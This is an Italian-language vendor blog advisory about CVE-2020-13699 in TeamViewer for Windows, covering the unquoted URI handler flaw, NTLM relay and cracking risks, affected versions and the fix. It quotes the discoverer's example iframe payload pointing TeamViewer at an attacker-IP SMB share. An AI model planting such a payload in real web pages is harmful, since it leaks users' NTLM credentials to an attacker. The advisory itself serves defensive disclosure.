Vulnerabilità ad alto rischio in TeamViewer potrebbe essere sfruttata per craccare la password degli utenti – SecPod Blog
Una vulnerabilità ad alto rischio è stata trovata in TeamViewer per Windows. È tracciata come “CVE-2020-13699”, con un punteggio CVSS di base di “8.8” che potrebbe essere sfruttata da aggressori remoti per crackare la password degli utenti e quindi, portare ad un ulteriore sfruttamento del sistema.
TeamViewer è un’applicazione software per il controllo remoto, la condivisione del desktop, le riunioni online, le conferenze web e il trasferimento di file tra computer sviluppata dalla società tedesca TeamViewer GmbH. TeamViewer è disponibile per Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8, e sistemi operativi BlackBerry. È anche possibile accedere a un sistema che esegue TeamViewer con un browser web.
Un recente aumento nell’uso di applicazioni software di connettività remota a causa del recente COVID-19 Pandemic work from home culture shift.
(CVE-2020-13699) Dettagli sulla vulnerabilità:
- CVE-2020-13699 è una falla di sicurezza che deriva da un percorso o elemento di ricerca non quotato. Nello specifico, questa vulnerabilità è dovuta al fatto che l’applicazione non cita correttamente i suoi gestori URI personalizzati.
- Un utente con una versione vulnerabile di TeamViewer installata viene indotto a visitare un sito web malintenzionato per sfruttare questa vulnerabilità.
- Secondo Jeffrey Hofmann, un ingegnere della sicurezza di Praetorian, che ha scoperto e divulgato la vulnerabilità “Un utente malintenzionato potrebbe incorporare un iframe dannoso in un sito web con un URL creato ad hoc (iframe src=’teamviewer10: -play \attacker-IP\share\fake.tvs’) che avvierebbe il client desktop TeamViewer Windows e lo costringerebbe ad aprire una condivisione SMB remota.”
- Windows eseguirà l’autenticazione NTLM quando apre la condivisione SMB. Questa richiesta può essere ritrasmessa, cioè permette ad un attaccante di catturare un’autenticazione e inviarla ad un altro server, concedendogli la possibilità di eseguire operazioni sul server remoto utilizzando i privilegi dell’utente autenticato.
- Uno sfruttamento riuscito di questa vulnerabilità potrebbe permettere ad un attaccante remoto di lanciare TeamViewer con parametri arbitrari. L’applicazione potrebbe essere costretta a inoltrare una richiesta di autenticazione NTLM al sistema dell’attaccante, consentendo attacchi offline alla rainbow table e tentativi di cracking a forza bruta.
- Questi attacchi potrebbero portare ad un ulteriore sfruttamento a causa delle credenziali rubate dallo sfruttamento riuscito della vulnerabilità.
La divulgazione ha suggerito che non ci sono prove dello sfruttamento di questa vulnerabilità.
Secondo il CIS, il rischio di sfruttamento è alto per le istituzioni governative e le aziende di medie dimensioni. Nel caso delle piccole imprese, il rischio è medio e basso per gli utenti domestici.
Impatto
Lo sfruttamento delle vulnerabilità potrebbe consentire agli aggressori remoti di ottenere informazioni sensibili sulle credenziali o prendere il pieno controllo del sistema interessato.
Prodotti interessati
TeamViewer Windows Desktop Application prima della 8.0.258861, 9.0.258860, 10.0.258873,11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, e 15.8.3.
Soluzione
TeamViewer ha pubblicato un aggiornamento di sicurezza che affronta CVE-2020-13699.
SanerNow contenuto di sicurezza per rilevare e mitigare questa vulnerabilità è pubblicato. Raccomandiamo vivamente di applicare l’aggiornamento di sicurezza con le nostre istruzioni per l’articolo di supporto pubblicato.
.